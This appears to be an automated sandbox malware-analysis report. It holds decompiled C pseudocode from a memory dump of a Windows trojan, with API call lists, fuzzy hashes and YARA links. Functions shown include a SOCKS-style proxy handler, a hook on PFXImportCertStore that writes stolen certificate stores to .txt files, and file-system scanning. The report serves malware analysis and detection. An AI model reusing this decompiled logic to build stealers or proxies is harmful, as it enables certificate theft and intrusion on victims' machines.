			E0040EAFC(void* __eax, void* __ebx, void* __edx, intOrPtr _a4) {
				short _v44;
				char _v134;
				char _v408;
				char _v532;
				void* _t22;
				WCHAR* _t27;
				WCHAR* _t29;
				int _t35;
				void* _t36;
				WCHAR* _t38;
				void* _t47;

				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				E0041645D(0x422bc8, _a4, 0x1e6);
				E00406A66(_t36,  &_v532);
				if(E00416492( &_v408, 0x422bb8, 0x10) != 0) {
					L7:
					_t22 = 0;
				} else {
					_t38 =  *0x42299c; // 0x0
					_a4 = E00416F70(_t38);
					_t35 = E00416F70(0x4229a0);
					E0041662C(_t24 | 0xffffffff,  &_v134,  &_v44, 0, 0x14);
					if(_a4 <= _t35) {
						goto L7;
					} else {
						_t27 =  *0x42299c; // 0x0
						_t47 = _t35 + _t35;
						if( *((short*)(_t47 + _t27)) != 0x5c || StrCmpNIW(0x4229a0, _t27, _t35) != 0) {
							goto L7;
						} else {
							_t29 =  *0x42299c; // 0x0
							if(lstrcmpiW( &_v44, _t47 +  &(_t29[1])) != 0) {
								goto L7;
							} else {
								_t22 = 1;
							}
						}
					}
				}
				return _t22;
			}

0x0040eb04
0x0040eb15
0x0040eb21
0x0040eb3a
0x0040ebaa
0x0040ebaa
0x0040eb3c
0x0040eb3c
0x0040eb4e
0x0040eb58
0x0040eb68
0x0040eb70
0x00000000
0x0040eb72
0x0040eb72
0x0040eb77
0x0040eb7f
0x00000000
0x0040eb8e
0x0040eb8e
0x0040eba4
0x00000000
0x0040eba6
0x0040eba6
0x0040eba6
0x0040eba4
0x0040eb7f
0x0040eb70
0x0040ebb0

APIs

Part of subcall function 0041662C: MultiByteToWideChar.KERNEL32(00406B14,00000000,?,00406293,?,?,00406B14,00000000,00000032,77E49EB0,?,00000000), ref: 00416643

StrCmpNIW.SHLWAPI(004229A0,00000000,00000000,00000000,00000014,00000010,?,00422BC8,?,000001E6,36D62AA8,?,000000B7), ref: 0040EB84
lstrcmpiW.KERNEL32(?,?), ref: 0040EB9C

Strings

Cy, xrefs: 0040EB15
Zy, xrefs: 0040EB33

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidelstrcmpi
String ID: Cy$Zy
API String ID: 1977948566-282925538
Opcode ID: df8e3b763628234723dcedb259841dc47894689b7e1a56a0eea09a09b6e8d1a8
Instruction ID: 88c7da47f3007232b4d115a3e4e86d71e8b8f5ef09cb54b84c447fc4a059bd67
Opcode Fuzzy Hash: df8e3b763628234723dcedb259841dc47894689b7e1a56a0eea09a09b6e8d1a8
Instruction Fuzzy Hash: 5A119371710118ABDF20EF61DC45EEA77BCAB94354F80843AF901A7191D678E982CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00419B8E, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419B8E(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x00419bd5
0x00419be1
0x00419be6
0x00000000
0x00000000
0x00419bc1
0x00419ba9
0x00419bb0
0x00419bbb
0x00000000
0x00419bbb
0x00000000
0x00419ba9
0x00419bc1
0x00419be9
0x00419bf1

APIs

PeekMessageW.USER32 ref: 00419BCB
MsgWaitForMultipleObjects.USER32 ref: 00419BDF

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 041a5962bd488d86ce0dab827f1c0ad8680bc075ff408f9c6d719008b6bf173b
Instruction ID: 8091aa7603a11f3deda56e2aa14124edef0b3f71fe2324812c94375264362125
Opcode Fuzzy Hash: 041a5962bd488d86ce0dab827f1c0ad8680bc075ff408f9c6d719008b6bf173b
Instruction Fuzzy Hash: 8EF0FC321082096BD710AA99EC48DA7BBECFB45394F04057AF611E3171D176EC448775

Uniqueness

Uniqueness Score: -1.00%

Function 004159EE, Relevance: 6.0, APIs: 4, Instructions: 40
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004159EE(void* __eflags) {
				void* _t1;
				long _t6;
				void* _t12;

				_t1 = E0040679A(_t12, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					if(E004068C0() == 0) {
						L7:
						E00419BF4(_t19);
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x422e04, 0x1388);
					while(_t6 == 0x102) {
						E0041CB9B();
						_t6 = WaitForSingleObject( *0x422e04, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

0x004159f6
0x004159fb
0x004159ff
0x00415a0b
0x00415a4f
0x00415a50
0x00000000
0x00415a55
0x00415a19
0x00415a31
0x00415a48
0x00415a3a
0x00415a46
0x00415a46
0x00000000
0x00415a4e
0x00000000

APIs

Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB

GetCurrentThread.KERNEL32 ref: 00415A12
SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 00415A19
WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 00415A31

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: 4b0a058b1a23762436f824c60ea21feaec8000a93c947a722ec8ea9b6060fa5b
Instruction ID: d434c60f3197cb6623957fa7470462ab1d7e9e4ff712be999bfed4d4ae138995
Opcode Fuzzy Hash: 4b0a058b1a23762436f824c60ea21feaec8000a93c947a722ec8ea9b6060fa5b
Instruction Fuzzy Hash: A7F05972540208BEEA1137A4AEC5DDB3E0DDF843EC7100233F501B2262C6BD4C8241B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E262, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E262(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E004199D9(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E004193D4(_t61, _t110) != 0) {
					while(E004193D4(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E0040E1EC(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E004164D4( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E00419469( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E0041981C(_t116, _t127);
									_t84 = E0040E1EC(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E0041961D(_t110);
									}
									E004197C4(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00419563( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E0040E1EC(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E004197C4(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E00419794( &_v20,  &_a4);
									_v36 = _t126;
									E004197C4(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E0041981C(_t116, _t126);
										_t110 = _a4;
										_t125 = E0040E1EC(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E0041961D(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E004193D4(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E0041645D( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x0040e26c
0x0040e272
0x0040e282
0x0040e286
0x0040e289
0x0040e28a
0x0040e296
0x0040e2a5
0x0040e2a3
0x0040e2ba
0x0040e2d3
0x0040e2e1
0x0040e2ea
0x0040e374
0x0040e378
0x0040e37c
0x0040e4aa
0x00000000
0x0040e4ba
0x0040e389
0x0040e390
0x0040e391
0x0040e399
0x0040e39a
0x0040e44e
0x0040e458
0x0040e460
0x0040e465
0x0040e3a3
0x0040e3a3
0x00000000
0x0040e3a3
0x0040e46c
0x0040e478
0x0040e480
0x0040e48d
0x0040e495
0x0040e48f
0x0040e48f
0x0040e48f
0x0040e482
0x0040e482
0x0040e483
0x0040e483
0x0040e499
0x0040e4a2
0x0040e440
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e4a2
0x0040e3a1
0x0040e3b6
0x0040e3b8
0x0040e3be
0x00000000
0x00000000
0x0040e3cc
0x0040e3d1
0x0040e429
0x0040e429
0x0040e431
0x00000000
0x00000000
0x0040e43a
0x0040e43c
0x0040e43c
0x00000000
0x0040e43a
0x0040e3e3
0x0040e3e5
0x0040e3e8
0x0040e3f0
0x0040e3ff
0x0040e407
0x0040e417
0x0040e41c
0x0040e41e
0x0040e421
0x0040e421
0x0040e426
0x00000000
0x0040e426
0x0040e3f2
0x0040e3f5
0x00000000
0x0040e3f5
0x00000000
0x0040e3a1
0x0040e2f0
0x0040e2f2
0x0040e2fa
0x0040e303
0x00000000
0x00000000
0x0040e305
0x0040e308
0x0040e311
0x0040e327
0x0040e32e
0x0040e331
0x0040e339
0x0040e341
0x0040e34f
0x0040e34a
0x0040e362
0x0040e367
0x0040e36a
0x0040e372
0x00000000
0x00000000
0x00000000
0x0040e372
0x0040e34c
0x0040e34c
0x00000000
0x0040e353
0x0040e33b
0x0040e33b
0x00000000
0x0040e33b
0x0040e313
0x0040e31a
0x00000000
0x00000000
0x00000000
0x0040e31c
0x00000000
0x0040e2f2
0x0040e2a3
0x0040e2a5
0x0040e298
0x00000000

APIs

Part of subcall function 004199D9: getsockname.WS2_32(?,?,?), ref: 004199F7

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040E331
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0040E36A

Part of subcall function 0041981C: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00419832

Part of subcall function 0040E1EC: getpeername.WS2_32(000000FF,?,?), ref: 0040E210

Part of subcall function 0041961D: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 004196BD

Strings

Z, xrefs: 0040E4A4

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: a5eecf883ce6ed4f2c3b0c2ba936ab7e90df7257c14824027f149b3f90b6fefb
Instruction ID: 828ea8a3e819b9e2e630089770e81e5f2174330aea6fdfa25adb7846d87537b5
Opcode Fuzzy Hash: a5eecf883ce6ed4f2c3b0c2ba936ab7e90df7257c14824027f149b3f90b6fefb
Instruction Fuzzy Hash: 23615D71E00154AADF20EAA6CC01AEFBBB99F45314F08497BF911F32C2C67C9951D76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C277, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040C277(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E004068C0() != 0) {
					GetSystemTime( &_v760);
					E004159A4(0xaa,  &_v600);
					_t74 =  &_v744;
					E004159A4(0xab, _t74);
					E0040C056( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E00417114( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E004056A7(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E0041645D(_t79 + 0x48 + E00416F70( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E00417278(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E004056A7(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E00417266( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x0040c277
0x0040c27d
0x0040c284
0x0040c290
0x0040c296
0x0040c29c
0x0040c2dc
0x0040c2ee
0x0040c2f3
0x0040c2fc
0x0040c308
0x0040c312
0x0040c318
0x0040c31e
0x0040c321
0x0040c329
0x0040c331
0x0040c334
0x0040c339
0x0040c33e
0x0040c343
0x0040c35b
0x0040c360
0x0040c383
0x0040c38e
0x0040c397
0x0040c3a9
0x0040c3ae
0x0040c3ae
0x0040c397
0x0040c360
0x0040c343
0x0040c3bd

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0040C290

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

GetSystemTime.KERNEL32(?), ref: 0040C2DC

Part of subcall function 0040C056: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C1AD,?,?,00000000), ref: 0040C06B

Strings

.txt, xrefs: 0040C372

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 6eeb37572300eb1af63f343d31534b19375fc5fff73d56938630278e8d576784
Instruction ID: 830d084734f3d208e6edac3c1eb0bc641a42a1be845fefad38999a26797a3478
Opcode Fuzzy Hash: 6eeb37572300eb1af63f343d31534b19375fc5fff73d56938630278e8d576784
Instruction Fuzzy Hash: 3031A331104351DBCB20EF55CE81BAB77A8EF88304F04462BBE98A72E1DB79D945C766

Uniqueness

Uniqueness Score: -1.00%

Function 004127BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00403718,00000000,00004401,00403728,?,?,00000000,00000001), ref: 004127EA
CoCreateInstance.OLE32(004036E8,00000000,00004401,004036F8,?,?,00000000,00000001), ref: 0041283D

Strings

D, xrefs: 00412868

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: 9f8e14bf4a76a0dbb43b2e3770b7056a2c4ea794c618d9c969596466511f67c6
Instruction ID: bb01168a003f90e28e99fd41c14ffeb896fa340f48e2b69d67118d7307f3f16c
Opcode Fuzzy Hash: 9f8e14bf4a76a0dbb43b2e3770b7056a2c4ea794c618d9c969596466511f67c6
Instruction Fuzzy Hash: 66318BB2204206AFE710DF64CD85DABB7ECAF84744F00062EF954D7290E7B5DC568BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD26, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CD26(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char _v364;
				char _v504;
				void* __edi;
				signed int _t17;
				signed int _t18;
				int _t29;
				void* _t35;

				if( *0x423f60 == 0) {
					E00406B47(0x423f48, __ecx, 2, 0x423f60);
				}
				_v8 = _v8 & 0x00000000;
				_t31 =  &_v12;
				_t29 = 0;
				_v12 = 0x80000001;
				_t17 = RegOpenKeyExW(0x80000001, 0x423f60, 0, 1,  &_v12);
				if(_t17 != 0) {
					_t18 = _t17 | 0xffffffff;
				} else {
					_t18 = E0041A6F4( &_v12, 0x423f48,  &_v16,  &_v8);
				}
				_t35 = 0x74;
				if(_t18 == 0xffffffff) {
					L10:
					return E004164D4(_t18, _a4, 0, _t35);
				}
				if(_v16 == 3 && _t18 >= _t35) {
					E0041645D(_a4, _v8, _t35);
					E00406A66(_t31,  &_v504);
					E0041789D( &_v364, _t31, _a4, _t35);
					_t29 = 1;
				}
				_t18 = E00416421(_v8);
				if(_t29 == 0) {
					goto L10;
				}
				return _t18;
			}

0x0041cd44
0x0041cd4b
0x0041cd4b
0x0041cd50
0x0041cd54
0x0041cd63
0x0041cd65
0x0041cd68
0x0041cd70
0x0041cd85
0x0041cd72
0x0041cd7e
0x0041cd7e
0x0041cd8a
0x0041cd8e
0x0041cdcf
0x00000000
0x0041cdd5
0x0041cd94
0x0041cda1
0x0041cdad
0x0041cdbc
0x0041cdc1
0x0041cdc1
0x0041cdc6
0x0041cdcd
0x00000000
0x00000000
0x0041cdde

APIs

RegOpenKeyExW.ADVAPI32(80000001,00423F60,00000000,00000001,?,?,74B5F560,00000000), ref: 0041CD68

Strings

`?B, xrefs: 0041CD3A
H?B, xrefs: 0041CD3F

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID: H?B$`?B
API String ID: 71445658-2585568248
Opcode ID: 8af1f4f2f83393f953a6ec64d8da8cc1892d4b7ae559e01b8d61044811df280e
Instruction ID: 3024f29345cf7a417e6f906543a30ec7546f20ce1fa6350045979692f4563005
Opcode Fuzzy Hash: 8af1f4f2f83393f953a6ec64d8da8cc1892d4b7ae559e01b8d61044811df280e
Instruction Fuzzy Hash: DB11CD32A80118B6CB20AAA5ED85FDF7F789F01364F104176F104A20E0D7789A85CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA7A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041AA7A(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				char _v268;
				char _v280;
				char _v284;
				signed int _v290;
				signed int _v292;
				signed int _v296;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				char* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t46;
				signed int _t50;
				void* _t51;
				signed int _t52;
				void* _t54;

				_t54 = (_t52 & 0xfffffff8) - 0x118;
				_t46 = __ecx;
				_t24 = E0041645D( &_v284, _a4, 0x10);
				_v296 = _v296 ^ _t24;
				_v292 = _v292 ^ _t24;
				_v290 = _v290 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E0041645D( &_v268, _a12, 0x102);
					E0041789D( &_v280, _t41,  &_v296, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t50);
							E004167C2(_t50, _t42, _t46);
							_t46 = _t46 + _t50 * 2;
						}
					}
				}
				_t29 =  &_v284;
				__imp__StringFromGUID2(_t29, _t46, 0x28);
				return _t29;
			}

0x0041aa80
0x0041aa8d
0x0041aa94
0x0041aa99
0x0041aa9d
0x0041aaa5
0x0041aaaa
0x0041aaac
0x0041aaae
0x0041aab2
0x0041aab6
0x0041aaba
0x0041aabc
0x0041aabc
0x0041aabe
0x0041aabf
0x0041aac8
0x0041aad7
0x0041aae7
0x0041aae7
0x0041aaf0
0x0041aaf3
0x0041aaf5
0x0041aaf6
0x0041ab04
0x0041ab09
0x00000000
0x0041aaf8
0x0041aaf9
0x0041aafb
0x0041ab00
0x0041ab0b
0x0041ab0b
0x0041ab10
0x0041ab15
0x0041ab15
0x0041aaf9
0x0041aaf6
0x0041ab1b
0x0041ab20
0x0041ab2b

APIs

StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 0041AB20

Strings

Local\, xrefs: 0041AB04
Global\, xrefs: 0041AAFB

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: 439d1fedfea8792139d508c67cf26143e6b307d0adf75bd9b1b4c8e1581f8674
Instruction ID: d00c6c5a300621070014e47ba4eff8d214a100805a3179d4f3ecc248b705ecdb
Opcode Fuzzy Hash: 439d1fedfea8792139d508c67cf26143e6b307d0adf75bd9b1b4c8e1581f8674
Instruction Fuzzy Hash: 9511263221834967C714EE749809BEB37A9EF84714F00892FF691D61C1DBBCD1A5C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00414519, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00414519(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E004159A4(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E004164D4( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0041BB58( &_v572,  &_v16, _t37, 1, 2, E0041427E,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00416421(_v12);
				}
				return E0041252D(_t29, _v12, 0xcb);
			}

0x00414524
0x0041452c
0x00414535
0x0041453f
0x00414546
0x0041454d
0x00414554
0x00414559
0x0041455b
0x0041455b
0x00414569
0x0041456f
0x00414571
0x00414583
0x0041458c
0x0041458c
0x00414591
0x00414592
0x0041459a
0x00000000
0x004145b3
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00414569

Part of subcall function 0041BB58: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
Part of subcall function 0041BB58: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
Part of subcall function 0041BB58: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
Part of subcall function 0041BB58: Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
Part of subcall function 0041BB58: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
Part of subcall function 0041BB58: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Strings

&, xrefs: 0041453F
#, xrefs: 0041454D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 3d8e89510d9a6c78c59bd0a2bd641de29b36c892ffe8607c5642eff911865b28
Instruction ID: 10eae88adfd1eaa7f7b1e2b22cd4cc7ff9f5ec3795549b327acee0e2604537d0
Opcode Fuzzy Hash: 3d8e89510d9a6c78c59bd0a2bd641de29b36c892ffe8607c5642eff911865b28
Instruction Fuzzy Hash: 2E11A071901228BBDB209B95DC09FDF7F79EF81304F00405AB604A6180D7785B85CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00414E3A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00414E3A(void* __eflags) {
				intOrPtr _v8;
